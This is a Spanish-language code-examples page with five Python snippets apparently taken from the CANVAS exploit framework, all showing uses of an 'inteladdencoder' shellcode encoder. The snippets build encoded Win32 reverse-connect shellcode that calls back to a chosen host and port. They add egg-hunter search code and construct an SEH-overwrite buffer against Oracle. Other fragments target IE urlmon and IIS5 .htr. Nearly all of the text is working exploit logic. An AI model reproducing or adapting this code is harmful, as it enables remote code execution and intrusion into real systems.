Ejemplos de inteladdencoder en Python

Ejemplo n.º 1

 def createShellcode(self):
     localhost = self.callback.ip
     localport = self.callback.port
     from shellcode import shellcodeGenerator
     sc = shellcodeGenerator.win32()
     sc.addAttr("revert_to_self_before_importing_ws2_32", None)
     sc.addAttr("tcpconnect", {"port": localport, "ipaddress": localhost})
     sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"})  #MOSDEF
     self.shellcode = sc.get()
     from encoder import chunkedaddencoder
     encoder = chunkedaddencoder.intelchunkedaddencoder()
     encoder.setbadstring(self.badstring)
     self.log("Encoding shellcode")
     self.shellcode = encoder.encode(self.shellcode)
     if self.shellcode == "":
         self.log("Problem encoding shellcode")
         return 0
     self.shellcode = self.tag2 + self.tag1 + self.shellcode
     from shellcode import win32shell
     self.searchcode = win32shell.getsearchcode(self.tag1, self.tag2)
     from encoder import addencoder
     encoder = addencoder.inteladdencoder()
     encoder.setbadstring(self.searchbadstring)
     self.encodedsearchcode = encoder.encode(self.searchcode)
     if not self.encodedsearchcode:
         return None
     self.log(
         "Length of search shellcode: %d, length of real shellcode: %d\n" %
         (len(self.searchcode), len(self.shellcode)))
     return 1

Ejemplo n.º 2

Archivo: vswin32shellcode.py Proyecto: zu1kbackup/Canvas

 def vscreateKnownWin32Shellcode(self,
                                 badchars,
                                 known,
                                 host,
                                 port,
                                 subesp=0):
     """
     Used from VS, badchars are received.
     Creates a very small shellcode that is SP+Lang dependant
     
     check the top of win32knownshellcodegenerator for valid values of known
     """
     from shellcode.win32knownshellcodegenerator import win32Known
     from encoder import addencoder
     myobj = win32Known()
     self.badstring = badchars
     myobj.badstring = self.badstring
     myobj.knownSP(known)
     myobj.addAttr("findeipnoesp",
                   {"subespval": subesp})  #don't mess with eip
     myobj.addAttr("smalltcpconnect", {"port": port, "ipaddress": host})
     myobj.addAttr("smallrecv", None)
     myobj.addAttr("NoExit", None)
     #self.addAttr("initstackswap",None)
     #self.addAttr("stackSwap",None)
     ret = myobj.get()
     #import encoder
     encoder = addencoder.inteladdencoder()
     encoder.setbadstring(self.badstring)
     encodedshellcode = encoder.encode(ret)
     self.shellcode = encodedshellcode
     return

Ejemplo n.º 3

    def getOracleChunk(self, retadd, seoffset, align):
        pad = 1
        orachunk = ""
        chunk = ""

        self.log("Building Oracle specific chunk")
        if pad:
            chunk += "%X\r\n" % pad
            chunk += "P" * pad
            chunk += "\r\n"
            diff = len(chunk)
        chunk += "FFFFFFF4"

        orachunk = "A" * (8192 - (8 + 2 + diff))
        # mix in searchcode for our main payload
        self.log("Building searchcode")
        searchcode = win32shell.getsearchcode(self.tag1, self.tag2)
        from encoder import addencoder
        encoder = addencoder.inteladdencoder()
        encoder.setbadstring(self.searchbadstring)
        searchcode = encoder.encode(searchcode)
        #searchcode = "\xcc" + searchcode
        # mix it in the sauce
        self.log("Adding searchcode")
        orachunk = stroverwrite(orachunk, searchcode,
                                (((seoffset - 1) * 4) + align) -
                                len(searchcode))

        # ebx points at the ptr to next SEH record that we own
        # we abuse this by using a jmp ebx addy and putting a
        # jmp in the SEH record ptr to jmp over the SE handler tag
        # and into a jmp back to some search shellcode for our main
        # payload

        # ebx will point at SEH next ptr, we jmp over the SE handler tag
        orachunk = stroverwrite(orachunk, "AA\xeb\x04",
                                ((seoffset - 1) * 4) + align)
        # the actual SE handler tag
        orachunk = stroverwrite(orachunk, intel_order(retadd),
                                (seoffset * 4) + align)
        # jmp to searchcode here (addl 0x600,%esp jmp %esp)
        orachunk = stroverwrite(orachunk, "\x81\xc4\x00\x06\x00\x00\xff\xe4",
                                ((seoffset + 1) * 4) + align)
        """
        findme = 0x41424301
        for i in range(0, 2044):
            findme = self.sanitiseAdd(findme)
            print "offset i: %d %.8X"% (i, findme)
            orachunk = stroverwrite(orachunk, intel_order(findme), i * 4)
            findme = findme + 1
        
        """
        chunk += orachunk
        return chunk

Ejemplo n.º 4

Archivo: ieurlmon.py Proyecto: zu1kbackup/Canvas

    def createShellcode(self, localhost, localport):

        self.log("Calling back to %s:%s" % (localhost, localport))
        self.createWin32Shellcode(self.badstring, localhost, localport)
        self.shellcode = self.tag2 + self.tag1 + self.shellcode
        self.searchcode = win32shell.getsearchcode(self.tag1, self.tag2)
        encoder = addencoder.inteladdencoder()
        encoder.setbadstring(self.badstring)
        #we need to solve a little problem with esp being
        #in our string by subtracting from esp
        SUBESP5000 = binstring("81 ec") + intel_order(5000)
        self.searchcode = SUBESP5000 + self.searchcode
        self.encodedsearchcode = encoder.encode(self.searchcode)
        if not self.encodedsearchcode:
            return None
        self.log(
            "Length of search shellcode: %d, length of real shellcode: %d\n" %
            (len(self.searchcode), len(self.shellcode)))
        #print prettyprint(self.encodedsearchcode)
        return 1

Ejemplo n.º 5

Archivo: iis5htr.py Proyecto: zu1kbackup/Canvas

            localhost = a
            i += 1
        if o in ["-d"]:
            localport = a
            i += 1
        if o in ["-s"]:
            app.setSSL(1)

    if i < 4:
        #print "Only got %d args"%i
        usage()

    rawshellcode = win32shell.getshellcode(localhost, localport)
    #print "len rawshellcode = "+str(len(rawshellcode))
    #set up the shellcode
    encoder = addencoder.inteladdencoder()
    #figuring out these can be a pain.
    encoder.setbadstring("\x00\x6b\x2f\x20\x0a\x0d\xff\xe0")

    print "Encoding shellcode. This may take a while."
    shellcode = encoder.encode(rawshellcode)
    print "encoder reports following key: 0x%8.8x" % (encoder.getKey())
    print "Done encoding shellcode."
    if shellcode == "":
        print "Could not encode shellcode"
        sys.exit(0)
    #debug int
    #shellcode="\xcc"+shellcode
    app.setShellcode(shellcode)
    app.setHost(target)
    app.setPort(int(targetport))